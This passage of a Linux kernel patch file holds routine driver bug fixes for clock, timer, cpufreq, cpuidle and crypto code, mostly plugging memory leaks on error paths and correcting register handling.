++++ b/drivers/clk/rockchip/clk-pll.c
+@@ -981,6 +981,7 @@ struct clk *rockchip_clk_register_pll(struct rockchip_clk_provider *ctx,
+ 	return mux_clk;
+ 
+ err_pll:
++	kfree(pll->rate_table);
+ 	clk_unregister(mux_clk);
+ 	mux_clk = pll_clk;
+ err_mux:
+diff --git a/drivers/clk/samsung/clk-pll.c b/drivers/clk/samsung/clk-pll.c
+index fe383471c5f0a..0ff28938943f0 100644
+--- a/drivers/clk/samsung/clk-pll.c
++++ b/drivers/clk/samsung/clk-pll.c
+@@ -1583,6 +1583,7 @@ static void __init _samsung_clk_register_pll(struct samsung_clk_provider *ctx,
+ 	if (ret) {
+ 		pr_err("%s: failed to register pll clock %s : %d\n",
+ 			__func__, pll_clk->name, ret);
++		kfree(pll->rate_table);
+ 		kfree(pll);
+ 		return;
+ 	}
+diff --git a/drivers/clk/socfpga/clk-gate.c b/drivers/clk/socfpga/clk-gate.c
+index 53d6e3ec4309f..c94b59b80dd43 100644
+--- a/drivers/clk/socfpga/clk-gate.c
++++ b/drivers/clk/socfpga/clk-gate.c
+@@ -188,8 +188,10 @@ void __init socfpga_gate_init(struct device_node *node)
+ 		return;
+ 
+ 	ops = kmemdup(&gateclk_ops, sizeof(gateclk_ops), GFP_KERNEL);
+-	if (WARN_ON(!ops))
++	if (WARN_ON(!ops)) {
++		kfree(socfpga_clk);
+ 		return;
++	}
+ 
+ 	rc = of_property_read_u32_array(node, "clk-gate", clk_gate, 2);
+ 	if (rc)
+@@ -243,6 +245,7 @@ void __init socfpga_gate_init(struct device_node *node)
+ 
+ 	err = clk_hw_register(NULL, hw_clk);
+ 	if (err) {
++		kfree(ops);
+ 		kfree(socfpga_clk);
+ 		return;
+ 	}
+diff --git a/drivers/clk/st/clkgen-fsyn.c b/drivers/clk/st/clkgen-fsyn.c
+index d820292a381d0..40df1db102a77 100644
+--- a/drivers/clk/st/clkgen-fsyn.c
++++ b/drivers/clk/st/clkgen-fsyn.c
+@@ -1020,9 +1020,10 @@ static void __init st_of_quadfs_setup(struct device_node *np,
+ 
+ 	clk = st_clk_register_quadfs_pll(pll_name, clk_parent_name, datac->data,
+ 			reg, lock);
+-	if (IS_ERR(clk))
++	if (IS_ERR(clk)) {
++		kfree(lock);
+ 		goto err_exit;
+-	else
++	} else
+ 		pr_debug("%s: parent %s rate %u\n",
+ 			__clk_get_name(clk),
+ 			__clk_get_name(clk_get_parent(clk)),
+diff --git a/drivers/clk/visconti/pll.c b/drivers/clk/visconti/pll.c
+index a484cb945d67b..1f3234f226674 100644
+--- a/drivers/clk/visconti/pll.c
++++ b/drivers/clk/visconti/pll.c
+@@ -277,6 +277,7 @@ static struct clk_hw *visconti_register_pll(struct visconti_pll_provider *ctx,
+ 	ret = clk_hw_register(NULL, &pll->hw);
+ 	if (ret) {
+ 		pr_err("failed to register pll clock %s : %d\n", name, ret);
++		kfree(pll->rate_table);
+ 		kfree(pll);
+ 		pll_hw_clk = ERR_PTR(ret);
+ 	}
+diff --git a/drivers/clocksource/sh_cmt.c b/drivers/clocksource/sh_cmt.c
+index 64dcb082d4cf6..7b952aa52c0b9 100644
+--- a/drivers/clocksource/sh_cmt.c
++++ b/drivers/clocksource/sh_cmt.c
+@@ -13,6 +13,7 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/ioport.h>
+ #include <linux/irq.h>
+ #include <linux/module.h>
+@@ -116,6 +117,7 @@ struct sh_cmt_device {
+ 	void __iomem *mapbase;
+ 	struct clk *clk;
+ 	unsigned long rate;
++	unsigned int reg_delay;
+ 
+ 	raw_spinlock_t lock; /* Protect the shared start/stop register */
+ 
+@@ -247,10 +249,17 @@ static inline u32 sh_cmt_read_cmstr(struct sh_cmt_channel *ch)
+ 
+ static inline void sh_cmt_write_cmstr(struct sh_cmt_channel *ch, u32 value)
+ {
+-	if (ch->iostart)
+-		ch->cmt->info->write_control(ch->iostart, 0, value);
+-	else
+-		ch->cmt->info->write_control(ch->cmt->mapbase, 0, value);
++	u32 old_value = sh_cmt_read_cmstr(ch);
++
++	if (value != old_value) {
++		if (ch->iostart) {
++			ch->cmt->info->write_control(ch->iostart, 0, value);
++			udelay(ch->cmt->reg_delay);
++		} else {
++			ch->cmt->info->write_control(ch->cmt->mapbase, 0, value);
++			udelay(ch->cmt->reg_delay);
++		}
++	}
+ }
+ 
+ static inline u32 sh_cmt_read_cmcsr(struct sh_cmt_channel *ch)
+@@ -260,7 +269,12 @@ static inline u32 sh_cmt_read_cmcsr(struct sh_cmt_channel *ch)
+ 
+ static inline void sh_cmt_write_cmcsr(struct sh_cmt_channel *ch, u32 value)
+ {
+-	ch->cmt->info->write_control(ch->ioctrl, CMCSR, value);
++	u32 old_value = sh_cmt_read_cmcsr(ch);
++
++	if (value != old_value) {
++		ch->cmt->info->write_control(ch->ioctrl, CMCSR, value);
++		udelay(ch->cmt->reg_delay);
++	}
+ }
+ 
+ static inline u32 sh_cmt_read_cmcnt(struct sh_cmt_channel *ch)
+@@ -268,14 +282,33 @@ static inline u32 sh_cmt_read_cmcnt(struct sh_cmt_channel *ch)
+ 	return ch->cmt->info->read_count(ch->ioctrl, CMCNT);
+ }
+ 
+-static inline void sh_cmt_write_cmcnt(struct sh_cmt_channel *ch, u32 value)
++static inline int sh_cmt_write_cmcnt(struct sh_cmt_channel *ch, u32 value)
+ {
++	/* Tests showed that we need to wait 3 clocks here */
++	unsigned int cmcnt_delay = DIV_ROUND_UP(3 * ch->cmt->reg_delay, 2);
++	u32 reg;
++
++	if (ch->cmt->info->model > SH_CMT_16BIT) {
++		int ret = read_poll_timeout_atomic(sh_cmt_read_cmcsr, reg,
++						   !(reg & SH_CMT32_CMCSR_WRFLG),
++						   1, cmcnt_delay, false, ch);
++		if (ret < 0)
++			return ret;
++	}
++
+ 	ch->cmt->info->write_count(ch->ioctrl, CMCNT, value);
++	udelay(cmcnt_delay);
++	return 0;
+ }
+ 
+ static inline void sh_cmt_write_cmcor(struct sh_cmt_channel *ch, u32 value)
+ {
+-	ch->cmt->info->write_count(ch->ioctrl, CMCOR, value);
++	u32 old_value = ch->cmt->info->read_count(ch->ioctrl, CMCOR);
++
++	if (value != old_value) {
++		ch->cmt->info->write_count(ch->ioctrl, CMCOR, value);
++		udelay(ch->cmt->reg_delay);
++	}
+ }
+ 
+ static u32 sh_cmt_get_counter(struct sh_cmt_channel *ch, u32 *has_wrapped)
+@@ -319,7 +352,7 @@ static void sh_cmt_start_stop_ch(struct sh_cmt_channel *ch, int start)
+ 
+ static int sh_cmt_enable(struct sh_cmt_channel *ch)
+ {
+-	int k, ret;
++	int ret;
+ 
+ 	dev_pm_syscore_device(&ch->cmt->pdev->dev, true);
+ 
+@@ -347,26 +380,9 @@ static int sh_cmt_enable(struct sh_cmt_channel *ch)
+ 	}
+ 
+ 	sh_cmt_write_cmcor(ch, 0xffffffff);
+-	sh_cmt_write_cmcnt(ch, 0);
+-
+-	/*
+-	 * According to the sh73a0 user's manual, as CMCNT can be operated
+-	 * only by the RCLK (Pseudo 32 kHz), there's one restriction on
+-	 * modifying CMCNT register; two RCLK cycles are necessary before
+-	 * this register is either read or any modification of the value
+-	 * it holds is reflected in the LSI's actual operation.
+-	 *
+-	 * While at it, we're supposed to clear out the CMCNT as of this
+-	 * moment, so make sure it's processed properly here.  This will
+-	 * take RCLKx2 at maximum.
+-	 */
+-	for (k = 0; k < 100; k++) {
+-		if (!sh_cmt_read_cmcnt(ch))
+-			break;
+-		udelay(1);
+-	}
++	ret = sh_cmt_write_cmcnt(ch, 0);
+ 
+-	if (sh_cmt_read_cmcnt(ch)) {
++	if (ret || sh_cmt_read_cmcnt(ch)) {
+ 		dev_err(&ch->cmt->pdev->dev, "ch%u: cannot clear CMCNT\n",
+ 			ch->index);
+ 		ret = -ETIMEDOUT;
+@@ -995,8 +1011,8 @@ MODULE_DEVICE_TABLE(of, sh_cmt_of_table);
+ 
+ static int sh_cmt_setup(struct sh_cmt_device *cmt, struct platform_device *pdev)
+ {
+-	unsigned int mask;
+-	unsigned int i;
++	unsigned int mask, i;
++	unsigned long rate;
+ 	int ret;
+ 
+ 	cmt->pdev = pdev;
+@@ -1032,10 +1048,16 @@ static int sh_cmt_setup(struct sh_cmt_device *cmt, struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto err_clk_unprepare;
+ 
+-	if (cmt->info->width == 16)
+-		cmt->rate = clk_get_rate(cmt->clk) / 512;
+-	else
+-		cmt->rate = clk_get_rate(cmt->clk) / 8;
++	rate = clk_get_rate(cmt->clk);
++	if (!rate) {
++		ret = -EINVAL;
++		goto err_clk_disable;
++	}
++
++	/* We shall wait 2 input clks after register writes */
++	if (cmt->info->model >= SH_CMT_48BIT)
++		cmt->reg_delay = DIV_ROUND_UP(2UL * USEC_PER_SEC, rate);
++	cmt->rate = rate / (cmt->info->width == 16 ? 512 : 8);
+ 
+ 	/* Map the memory resource(s). */
+ 	ret = sh_cmt_map_memory(cmt);
+diff --git a/drivers/clocksource/timer-ti-dm-systimer.c b/drivers/clocksource/timer-ti-dm-systimer.c
+index 2737407ff0698..632523c1232f6 100644
+--- a/drivers/clocksource/timer-ti-dm-systimer.c
++++ b/drivers/clocksource/timer-ti-dm-systimer.c
+@@ -345,8 +345,10 @@ static int __init dmtimer_systimer_init_clock(struct dmtimer_systimer *t,
+ 		return error;
+ 
+ 	r = clk_get_rate(clock);
+-	if (!r)
++	if (!r) {
++		clk_disable_unprepare(clock);
+ 		return -ENODEV;
++	}
+ 
+ 	if (is_ick)
+ 		t->ick = clock;
+diff --git a/drivers/clocksource/timer-ti-dm.c b/drivers/clocksource/timer-ti-dm.c
+index cad29ded3a48f..00af1a8e34fbd 100644
+--- a/drivers/clocksource/timer-ti-dm.c
++++ b/drivers/clocksource/timer-ti-dm.c
+@@ -1258,7 +1258,7 @@ static struct platform_driver omap_dm_timer_driver = {
+ 	.remove = omap_dm_timer_remove,
+ 	.driver = {
+ 		.name   = "omap_timer",
+-		.of_match_table = of_match_ptr(omap_timer_match),
++		.of_match_table = omap_timer_match,
+ 		.pm = &omap_dm_timer_pm_ops,
+ 	},
+ };
+diff --git a/drivers/counter/stm32-lptimer-cnt.c b/drivers/counter/stm32-lptimer-cnt.c
+index d6b80b6dfc287..8439755559b21 100644
+--- a/drivers/counter/stm32-lptimer-cnt.c
++++ b/drivers/counter/stm32-lptimer-cnt.c
+@@ -69,7 +69,7 @@ static int stm32_lptim_set_enable_state(struct stm32_lptim_cnt *priv,
+ 
+ 	/* ensure CMP & ARR registers are properly written */
+ 	ret = regmap_read_poll_timeout(priv->regmap, STM32_LPTIM_ISR, val,
+-				       (val & STM32_LPTIM_CMPOK_ARROK),
++				       (val & STM32_LPTIM_CMPOK_ARROK) == STM32_LPTIM_CMPOK_ARROK,
+ 				       100, 1000);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/cpufreq/amd_freq_sensitivity.c b/drivers/cpufreq/amd_freq_sensitivity.c
+index 6448e03bcf488..59b19b9975e8c 100644
+--- a/drivers/cpufreq/amd_freq_sensitivity.c
++++ b/drivers/cpufreq/amd_freq_sensitivity.c
+@@ -125,6 +125,8 @@ static int __init amd_freq_sensitivity_init(void)
+ 	if (!pcidev) {
+ 		if (!boot_cpu_has(X86_FEATURE_PROC_FEEDBACK))
+ 			return -ENODEV;
++	} else {
++		pci_dev_put(pcidev);
+ 	}
+ 
+ 	if (rdmsrl_safe(MSR_AMD64_FREQ_SENSITIVITY_ACTUAL, &val))
+diff --git a/drivers/cpufreq/qcom-cpufreq-hw.c b/drivers/cpufreq/qcom-cpufreq-hw.c
+index 833589bc95e40..3c623a0bc147f 100644
+--- a/drivers/cpufreq/qcom-cpufreq-hw.c
++++ b/drivers/cpufreq/qcom-cpufreq-hw.c
+@@ -125,7 +125,35 @@ static int qcom_cpufreq_hw_target_index(struct cpufreq_policy *policy,
+ 	return 0;
+ }
+ 
++static unsigned long qcom_lmh_get_throttle_freq(struct qcom_cpufreq_data *data)
++{
++	unsigned int lval;
++
++	if (data->soc_data->reg_current_vote)
++		lval = readl_relaxed(data->base + data->soc_data->reg_current_vote) & 0x3ff;
++	else
++		lval = readl_relaxed(data->base + data->soc_data->reg_domain_state) & 0xff;
++
++	return lval * xo_rate;
++}
++
++/* Get the current frequency of the CPU (after throttling) */
+ static unsigned int qcom_cpufreq_hw_get(unsigned int cpu)
++{
++	struct qcom_cpufreq_data *data;
++	struct cpufreq_policy *policy;
++
++	policy = cpufreq_cpu_get_raw(cpu);
++	if (!policy)
++		return 0;
++
++	data = policy->driver_data;
++
++	return qcom_lmh_get_throttle_freq(data) / HZ_PER_KHZ;
++}
++
++/* Get the frequency requested by the cpufreq core for the CPU */
++static unsigned int qcom_cpufreq_get_freq(unsigned int cpu)
+ {
+ 	struct qcom_cpufreq_data *data;
+ 	const struct qcom_cpufreq_soc_data *soc_data;
+@@ -193,6 +221,7 @@ static int qcom_cpufreq_hw_read_lut(struct device *cpu_dev,
+ 		}
+ 	} else if (ret != -ENODEV) {
+ 		dev_err(cpu_dev, "Invalid opp table in device tree\n");
++		kfree(table);
+ 		return ret;
+ 	} else {
+ 		policy->fast_switch_possible = true;
+@@ -286,18 +315,6 @@ static void qcom_get_related_cpus(int index, struct cpumask *m)
+ 	}
+ }
+ 
+-static unsigned long qcom_lmh_get_throttle_freq(struct qcom_cpufreq_data *data)
+-{
+-	unsigned int lval;
+-
+-	if (data->soc_data->reg_current_vote)
+-		lval = readl_relaxed(data->base + data->soc_data->reg_current_vote) & 0x3ff;
+-	else
+-		lval = readl_relaxed(data->base + data->soc_data->reg_domain_state) & 0xff;
+-
+-	return lval * xo_rate;
+-}
+-
+ static void qcom_lmh_dcvs_notify(struct qcom_cpufreq_data *data)
+ {
+ 	struct cpufreq_policy *policy = data->policy;
+@@ -341,7 +358,7 @@ static void qcom_lmh_dcvs_notify(struct qcom_cpufreq_data *data)
+ 	 * If h/w throttled frequency is higher than what cpufreq has requested
+ 	 * for, then stop polling and switch back to interrupt mechanism.
+ 	 */
+-	if (throttled_freq >= qcom_cpufreq_hw_get(cpu))
++	if (throttled_freq >= qcom_cpufreq_get_freq(cpu))
+ 		enable_irq(data->throttle_irq);
+ 	else
+ 		mod_delayed_work(system_highpri_wq, &data->throttle_work,
+diff --git a/drivers/cpuidle/dt_idle_states.c b/drivers/cpuidle/dt_idle_states.c
+index 252f2a9686a62..448bc796b0b40 100644
+--- a/drivers/cpuidle/dt_idle_states.c
++++ b/drivers/cpuidle/dt_idle_states.c
+@@ -223,6 +223,6 @@ int dt_init_idle_driver(struct cpuidle_driver *drv,
+ 	 * also be 0 on platforms with missing DT idle states or legacy DT
+ 	 * configuration predating the DT idle states bindings.
+ 	 */
+-	return i;
++	return state_idx - start_idx;
+ }
+ EXPORT_SYMBOL_GPL(dt_init_idle_driver);
+diff --git a/drivers/crypto/Kconfig b/drivers/crypto/Kconfig
+index 55e75fbb658ee..c30b5a39c2ac2 100644
+--- a/drivers/crypto/Kconfig
++++ b/drivers/crypto/Kconfig
+@@ -669,7 +669,12 @@ config CRYPTO_DEV_IMGTEC_HASH
+ config CRYPTO_DEV_ROCKCHIP
+ 	tristate "Rockchip's Cryptographic Engine driver"
+ 	depends on OF && ARCH_ROCKCHIP
++	depends on PM
++	select CRYPTO_ECB
++	select CRYPTO_CBC
++	select CRYPTO_DES
+ 	select CRYPTO_AES
++	select CRYPTO_ENGINE
+ 	select CRYPTO_LIB_DES
+ 	select CRYPTO_MD5
+ 	select CRYPTO_SHA1
+diff --git a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+index 910d6751644cf..902f6be057ec6 100644
+--- a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
++++ b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+@@ -124,7 +124,7 @@ static int sun8i_ss_setup_ivs(struct skcipher_request *areq)
+ 	unsigned int ivsize = crypto_skcipher_ivsize(tfm);
+ 	struct sun8i_ss_flow *sf = &ss->flows[rctx->flow];
+ 	int i = 0;
+-	u32 a;
++	dma_addr_t a;
+ 	int err;
+ 
+ 	rctx->ivlen = ivsize;
+diff --git a/drivers/crypto/amlogic/amlogic-gxl-core.c b/drivers/crypto/amlogic/amlogic-gxl-core.c
+index 6e7ae896717cd..937187027ad57 100644
+--- a/drivers/crypto/amlogic/amlogic-gxl-core.c
++++ b/drivers/crypto/amlogic/amlogic-gxl-core.c
+@@ -237,7 +237,6 @@ static int meson_crypto_probe(struct platform_device *pdev)
+ 		return err;
+ 	}
+ 
+-	mc->irqs = devm_kcalloc(mc->dev, MAXFLOW, sizeof(int), GFP_KERNEL);
+ 	for (i = 0; i < MAXFLOW; i++) {
+ 		mc->irqs[i] = platform_get_irq(pdev, i);
+ 		if (mc->irqs[i] < 0)
+diff --git a/drivers/crypto/amlogic/amlogic-gxl.h b/drivers/crypto/amlogic/amlogic-gxl.h
+index dc0f142324a3c..8c0746a1d6d43 100644
+--- a/drivers/crypto/amlogic/amlogic-gxl.h
++++ b/drivers/crypto/amlogic/amlogic-gxl.h
+@@ -95,7 +95,7 @@ struct meson_dev {
+ 	struct device *dev;
+ 	struct meson_flow *chanlist;
+ 	atomic_t flow;
+-	int *irqs;
++	int irqs[MAXFLOW];
+ #ifdef CONFIG_CRYPTO_DEV_AMLOGIC_GXL_DEBUG
+ 	struct dentry *dbgfs_dir;
+ #endif
+diff --git a/drivers/crypto/cavium/nitrox/nitrox_mbx.c b/drivers/crypto/cavium/nitrox/nitrox_mbx.c
+index 9e7308e39b304..d4e06999af9b7 100644
+--- a/drivers/crypto/cavium/nitrox/nitrox_mbx.c
++++ b/drivers/crypto/cavium/nitrox/nitrox_mbx.c
+@@ -195,6 +195,7 @@ int nitrox_mbox_init(struct nitrox_device *ndev)
+ 	ndev->iov.pf2vf_wq = alloc_workqueue("nitrox_pf2vf", 0, 0);
+ 	if (!ndev->iov.pf2vf_wq) {
+ 		kfree(ndev->iov.vfdev);
++		ndev->iov.vfdev = NULL;
+ 		return -ENOMEM;
+ 	}
+ 	/* enable pf2vf mailbox interrupts */
+diff --git a/drivers/crypto/ccree/cc_debugfs.c b/drivers/crypto/ccree/cc_debugfs.c
+index 7083767602fcf..8f008f024f8f1 100644
+--- a/drivers/crypto/ccree/cc_debugfs.c
++++ b/drivers/crypto/ccree/cc_debugfs.c
+@@ -55,7 +55,7 @@ void __init cc_debugfs_global_init(void)
+ 	cc_debugfs_dir = debugfs_create_dir("ccree", NULL);
+ }
+ 
+-void __exit cc_debugfs_global_fini(void)
++void cc_debugfs_global_fini(void)
+ {
+ 	debugfs_remove(cc_debugfs_dir);
+ }
+diff --git a/drivers/crypto/ccree/cc_driver.c b/drivers/crypto/ccree/cc_driver.c
+index cadead18b59e8..d489c6f808925 100644
+--- a/drivers/crypto/ccree/cc_driver.c
++++ b/drivers/crypto/ccree/cc_driver.c
+@@ -651,9 +651,17 @@ static struct platform_driver ccree_driver = {
+ 
+ static int __init ccree_init(void)
+ {
++	int rc;
++
+ 	cc_debugfs_global_init();
+ 
+-	return platform_driver_register(&ccree_driver);
++	rc = platform_driver_register(&ccree_driver);
++	if (rc) {
++		cc_debugfs_global_fini();
++		return rc;
++	}
++
++	return 0;
+ }
+ module_init(ccree_init);
+ 
+diff --git a/drivers/crypto/hisilicon/hpre/hpre_main.c b/drivers/crypto/hisilicon/hpre/hpre_main.c
+index 471e5ca720f57..baf1faec7046f 100644
+--- a/drivers/crypto/hisilicon/hpre/hpre_main.c
++++ b/drivers/crypto/hisilicon/hpre/hpre_main.c
+@@ -1437,18 +1437,12 @@ err_with_qm_init:
+ static void hpre_remove(struct pci_dev *pdev)
+ {
+ 	struct hisi_qm *qm = pci_get_drvdata(pdev);
+-	int ret;
+ 
+ 	hisi_qm_pm_uninit(qm);
+ 	hisi_qm_wait_task_finish(qm, &hpre_devices);
+ 	hisi_qm_alg_unregister(qm, &hpre_devices);
+-	if (qm->fun_type == QM_HW_PF && qm->vfs_num) {
+-		ret = hisi_qm_sriov_disable(pdev, true);
+-		if (ret) {
+-			pci_err(pdev, "Disable SRIOV fail!\n");
+-			return;
+-		}
+-	}
++	if (qm->fun_type == QM_HW_PF && qm->vfs_num)
++		hisi_qm_sriov_disable(pdev, true);
+ 
+ 	hpre_debugfs_exit(qm);
+ 	hisi_qm_stop(qm, QM_NORMAL);
+diff --git a/drivers/crypto/hisilicon/qm.c b/drivers/crypto/hisilicon/qm.c
+index 8b387de69d229..07e1e39a5e378 100644
+--- a/drivers/crypto/hisilicon/qm.c
++++ b/drivers/crypto/hisilicon/qm.c
+@@ -250,7 +250,6 @@
+ #define QM_QOS_MIN_CIR_B		100
+ #define QM_QOS_MAX_CIR_U		6
+ #define QM_QOS_MAX_CIR_S		11
+-#define QM_QOS_VAL_MAX_LEN		32
+ #define QM_DFX_BASE		0x0100000
+ #define QM_DFX_STATE1		0x0104000
+ #define QM_DFX_STATE2		0x01040C8
+@@ -359,7 +358,7 @@ static const struct hisi_qm_cap_info qm_cap_info_vf[] = {
+ static const struct hisi_qm_cap_info qm_basic_info[] = {
+ 	{QM_TOTAL_QP_NUM_CAP,   0x100158, 0,  GENMASK(10, 0), 0x1000,    0x400,     0x400},
+ 	{QM_FUNC_MAX_QP_CAP,    0x100158, 11, GENMASK(10, 0), 0x1000,    0x400,     0x400},
+-	{QM_XEQ_DEPTH_CAP,      0x3104,   0,  GENMASK(15, 0), 0x800,     0x4000800, 0x4000800},
++	{QM_XEQ_DEPTH_CAP,      0x3104,   0,  GENMASK(31, 0), 0x800,     0x4000800, 0x4000800},
+ 	{QM_QP_DEPTH_CAP,       0x3108,   0,  GENMASK(31, 0), 0x4000400, 0x4000400, 0x4000400},
+ 	{QM_EQ_IRQ_TYPE_CAP,    0x310c,   0,  GENMASK(31, 0), 0x10000,   0x10000,   0x10000},
+ 	{QM_AEQ_IRQ_TYPE_CAP,   0x3110,   0,  GENMASK(31, 0), 0x0,       0x10001,   0x10001},
+@@ -909,8 +908,8 @@ static void qm_get_xqc_depth(struct hisi_qm *qm, u16 *low_bits,
+ 	u32 depth;
+ 
+ 	depth = hisi_qm_get_hw_info(qm, qm_basic_info, type, qm->cap_ver);
+-	*high_bits = depth & QM_XQ_DEPTH_MASK;
+-	*low_bits = (depth >> QM_XQ_DEPTH_SHIFT) & QM_XQ_DEPTH_MASK;
++	*low_bits = depth & QM_XQ_DEPTH_MASK;
++	*high_bits = (depth >> QM_XQ_DEPTH_SHIFT) & QM_XQ_DEPTH_MASK;
+ }
+ 
+ static u32 qm_get_irq_num(struct hisi_qm *qm)
+@@ -4614,7 +4613,7 @@ static ssize_t qm_get_qos_value(struct hisi_qm *qm, const char *buf,
+ 			       unsigned int *fun_index)
+ {
+ 	char tbuf_bdf[QM_DBG_READ_LEN] = {0};
+-	char val_buf[QM_QOS_VAL_MAX_LEN] = {0};
++	char val_buf[QM_DBG_READ_LEN] = {0};
+ 	u32 tmp1, device, function;
+ 	int ret, bus;
+ 
+@@ -5725,6 +5724,7 @@ static void qm_pf_reset_vf_done(struct hisi_qm *qm)
+ 		cmd = QM_VF_START_FAIL;
+ 	}
+ 
++	qm_cmd_init(qm);
+ 	ret = qm_ping_pf(qm, cmd);
+ 	if (ret)
+ 		dev_warn(&pdev->dev, "PF responds timeout in reset done!\n");
+@@ -5786,7 +5786,6 @@ static void qm_pf_reset_vf_process(struct hisi_qm *qm,
+ 		goto err_get_status;
+ 
+ 	qm_pf_reset_vf_done(qm);
+-	qm_cmd_init(qm);
+ 
+ 	dev_info(dev, "device reset done.\n");
+ 
+diff --git a/drivers/crypto/img-hash.c b/drivers/crypto/img-hash.c
+index d8e82d69745d8..9629e98bd68b7 100644
+--- a/drivers/crypto/img-hash.c
++++ b/drivers/crypto/img-hash.c
+@@ -358,12 +358,16 @@ static int img_hash_dma_init(struct img_hash_dev *hdev)
+ static void img_hash_dma_task(unsigned long d)
+ {
+ 	struct img_hash_dev *hdev = (struct img_hash_dev *)d;
+-	struct img_hash_request_ctx *ctx = ahash_request_ctx(hdev->req);
++	struct img_hash_request_ctx *ctx;
+ 	u8 *addr;
+ 	size_t nbytes, bleft, wsend, len, tbc;
+ 	struct scatterlist tsg;
+ 
+-	if (!hdev->req || !ctx->sg)
++	if (!hdev->req)
++		return;
++
++	ctx = ahash_request_ctx(hdev->req);
++	if (!ctx->sg)
+ 		return;
+ 
+ 	addr = sg_virt(ctx->sg);
+diff --git a/drivers/crypto/omap-sham.c b/drivers/crypto/omap-sham.c
+index 655a7f5a406a1..cbeda59c6b191 100644
+--- a/drivers/crypto/omap-sham.c
++++ b/drivers/crypto/omap-sham.c
+@@ -2114,7 +2114,7 @@ static int omap_sham_probe(struct platform_device *pdev)
+ 
+ 	pm_runtime_enable(dev);
+ 
+-	err = pm_runtime_get_sync(dev);
++	err = pm_runtime_resume_and_get(dev);
+ 	if (err < 0) {
+ 		dev_err(dev, "failed to get sync: %d\n", err);
+ 		goto err_pm;
+diff --git a/drivers/crypto/qat/qat_4xxx/adf_drv.c b/drivers/crypto/qat/qat_4xxx/adf_drv.c
+index 2f212561acc47..670a58b25cb16 100644
+--- a/drivers/crypto/qat/qat_4xxx/adf_drv.c
++++ b/drivers/crypto/qat/qat_4xxx/adf_drv.c
+@@ -261,6 +261,7 @@ static int adf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	hw_data->accel_capabilities_mask = hw_data->get_accel_cap(accel_dev);
+ 	if (!hw_data->accel_capabilities_mask) {
+ 		dev_err(&pdev->dev, "Failed to get capabilities mask.\n");
++		ret = -EINVAL;
+ 		goto out_err;
+ 	}
+ 
+diff --git a/drivers/crypto/rockchip/rk3288_crypto.c b/drivers/crypto/rockchip/rk3288_crypto.c
+index 35d73061d1569..14a0aef18ab13 100644
+--- a/drivers/crypto/rockchip/rk3288_crypto.c
++++ b/drivers/crypto/rockchip/rk3288_crypto.c
+@@ -65,186 +65,24 @@ static void rk_crypto_disable_clk(struct rk_crypto_info *dev)
+ 	clk_disable_unprepare(dev->sclk);
+ }
+ 
+-static int check_alignment(struct scatterlist *sg_src,
+-			   struct scatterlist *sg_dst,
+-			   int align_mask)
+-{
+-	int in, out, align;
+-
+-	in = IS_ALIGNED((uint32_t)sg_src->offset, 4) &&
+-	     IS_ALIGNED((uint32_t)sg_src->length, align_mask);
+-	if (!sg_dst)
+-		return in;
+-	out = IS_ALIGNED((uint32_t)sg_dst->offset, 4) &&
+-	      IS_ALIGNED((uint32_t)sg_dst->length, align_mask);
+-	align = in && out;
+-
+-	return (align && (sg_src->length == sg_dst->length));
+-}
+-
+-static int rk_load_data(struct rk_crypto_info *dev,
+-			struct scatterlist *sg_src,
+-			struct scatterlist *sg_dst)
+-{
+-	unsigned int count;
+-
+-	dev->aligned = dev->aligned ?
+-		check_alignment(sg_src, sg_dst, dev->align_size) :
+-		dev->aligned;
+-	if (dev->aligned) {
+-		count = min(dev->left_bytes, sg_src->length);
+-		dev->left_bytes -= count;
+-
+-		if (!dma_map_sg(dev->dev, sg_src, 1, DMA_TO_DEVICE)) {
+-			dev_err(dev->dev, "[%s:%d] dma_map_sg(src)  error\n",
+-				__func__, __LINE__);
+-			return -EINVAL;
+-		}
+-		dev->addr_in = sg_dma_address(sg_src);
+-
+-		if (sg_dst) {
+-			if (!dma_map_sg(dev->dev, sg_dst, 1, DMA_FROM_DEVICE)) {
+-				dev_err(dev->dev,
+-					"[%s:%d] dma_map_sg(dst)  error\n",
+-					__func__, __LINE__);
+-				dma_unmap_sg(dev->dev, sg_src, 1,
+-					     DMA_TO_DEVICE);
+-				return -EINVAL;
+-			}
+-			dev->addr_out = sg_dma_address(sg_dst);
+-		}
+-	} else {
+-		count = (dev->left_bytes > PAGE_SIZE) ?
+-			PAGE_SIZE : dev->left_bytes;
+-
+-		if (!sg_pcopy_to_buffer(dev->first, dev->src_nents,
+-					dev->addr_vir, count,
+-					dev->total - dev->left_bytes)) {
+-			dev_err(dev->dev, "[%s:%d] pcopy err\n",
+-				__func__, __LINE__);
+-			return -EINVAL;
+-		}
+-		dev->left_bytes -= count;
+-		sg_init_one(&dev->sg_tmp, dev->addr_vir, count);
+-		if (!dma_map_sg(dev->dev, &dev->sg_tmp, 1, DMA_TO_DEVICE)) {
+-			dev_err(dev->dev, "[%s:%d] dma_map_sg(sg_tmp)  error\n",
+-				__func__, __LINE__);
+-			return -ENOMEM;
+-		}
+-		dev->addr_in = sg_dma_address(&dev->sg_tmp);
+-
+-		if (sg_dst) {
+-			if (!dma_map_sg(dev->dev, &dev->sg_tmp, 1,
+-					DMA_FROM_DEVICE)) {
+-				dev_err(dev->dev,
+-					"[%s:%d] dma_map_sg(sg_tmp)  error\n",
+-					__func__, __LINE__);
+-				dma_unmap_sg(dev->dev, &dev->sg_tmp, 1,
+-					     DMA_TO_DEVICE);
+-				return -ENOMEM;
+-			}
+-			dev->addr_out = sg_dma_address(&dev->sg_tmp);
+-		}
+-	}
+-	dev->count = count;
+-	return 0;
+-}
+-
+-static void rk_unload_data(struct rk_crypto_info *dev)
+-{
+-	struct scatterlist *sg_in, *sg_out;
+-
+-	sg_in = dev->aligned ? dev->sg_src : &dev->sg_tmp;
+-	dma_unmap_sg(dev->dev, sg_in, 1, DMA_TO_DEVICE);
+-
+-	if (dev->sg_dst) {
+-		sg_out = dev->aligned ? dev->sg_dst : &dev->sg_tmp;
+-		dma_unmap_sg(dev->dev, sg_out, 1, DMA_FROM_DEVICE);
+-	}
+-}
+-
